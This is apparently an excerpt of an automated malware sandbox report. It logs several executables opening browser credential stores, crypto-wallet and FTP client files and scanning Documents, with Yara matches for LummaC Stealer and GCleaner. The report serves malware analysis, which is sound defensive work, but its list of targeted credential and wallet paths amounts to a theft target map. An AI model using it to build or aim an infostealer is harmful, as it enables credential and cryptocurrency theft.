Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\NWCXBPIUYI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077209001\xkV9ZML.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Directory queried: C:\Users\user\Documents\BJZFPPWAPT
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1077997001\cbf2b6294a.exe	Directory queried: C:\Users\user\Documents\EWZCVGNOWT
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Directory queried: C:\Users\user\Documents\LIJDSFKJZG
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Directory queried: C:\Users\user\Documents\PALRGUCVEH
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Directory queried: C:\Users\user\Documents\VWDFPKGDUF
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ
Source: C:\Users\user\AppData\Local\Temp\1077999001\KbSwZup.exe	Directory queried: C:\Users\user\Documents\EIVQSAOTAQ

Source: Yara match	File source: 31.2.ViGgA8C.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001C.00000003.3194955619.000000000130C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.3196348023.000000000130E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.3404364747.0000000000E12000.00000040.00000001.01000000.00000017.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.3060883563.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000003.3230226352.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.3049989282.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000003.3050114694.0000000000B2A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: cbf2b6294a.exe PID: 6340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: KbSwZup.exe PID: 6408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: ViGgA8C.exe PID: 6044, type: MEMORYSTR

Remote Access Functionality

Yara detected GCleaner

Source: Yara match	File source: 27.2.14b550e5e3.exe.defc000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.6761aae677.exe.ead8000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.14b550e5e3.exe.df28000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.6761aae677.exe.ea80000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 30.2.6761aae677.exe.eaac000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.14b550e5e3.exe.df54000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.14b550e5e3.exe.df80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.14b550e5e3.exe.dfac000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000001B.00000002.3192511267.000000000DD5A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3197107411.000000000DF80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.3393436751.000000000EAAC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3197107411.000000000DFAC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.3393436751.000000000EA80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3197107411.000000000DF28000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3197107411.000000000DF54000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.3344956274.000000000E844000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001E.00000002.3393436751.000000000EAD8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.3197107411.000000000DEFC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.3397348773.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: cbf2b6294a.exe PID: 6340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: KbSwZup.exe PID: 6408, type: MEMORYSTR
Source: Yara match	File source: 13.2.b7b5e2e140.exe.a770000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.b7b5e2e140.exe.a70a000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.b7b5e2e140.exe.a770000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.d755f09e83.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.xkV9ZML.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.KbSwZup.exe.d60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.b7b5e2e140.exe.a7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.b7b5e2e140.exe.a7c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.3.b7b5e2e140.exe.a770000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.b7b5e2e140.exe.a7c0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.d755f09e83.exe.aeb000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.xkV9ZML.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.4dfe6dfd76.exe.3e39550.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.d755f09e83.exe.aeb000.1.raw.unpack, type: UNPACKEDPE
